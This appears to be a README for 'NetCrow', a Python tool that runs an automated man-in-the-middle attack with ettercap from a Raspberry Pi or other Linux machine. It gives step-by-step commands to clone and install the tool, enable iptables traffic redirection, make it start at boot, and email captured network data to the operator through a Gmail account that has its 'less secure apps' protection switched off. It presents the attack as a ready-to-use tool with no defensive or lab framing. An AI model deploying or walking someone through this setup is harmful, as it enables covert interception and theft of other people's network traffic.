This is a fun little Tool made for the Raspberry Pi!
But of course it can be used on every Linux System...
It is using python Code to execute the MiTM automatically.
The Attack itself is using ettercap to analyize Network Traffic.
The main Features are:
- Automatic start at Boot (if needed)
- Sending gathered Data via E-Mail to the User
- Autosaving
sudo -i
cd to/path/you/want/to/install
git clone https://github.com/Raspberryy/NetCrow.git
cd NetCrow/
python attack.py -install
sudo nano /etc/ettercap/etter.conf
Search for "redir_command_on/off"
Remove # from "redir_command_on = "iptables [...]""
Remove # from "redir_command_off = "iptables [...]""
nano attack.py
Enter your E-Mail Data:
Sender = "YourGmailAdress@gmail.com"
Password = "YourGMailPassword"
Reciever = "YourEMailAdress@anyhost.com"
DO NOT FORGET:
Allow less secure apps to access your Gmail account
Info: https://support.google.com/accounts/answer/6010255?hl=en
Disable: https://www.google.com/settings/security/lesssecureapps
sudo python attack.py --AutoStart-Enable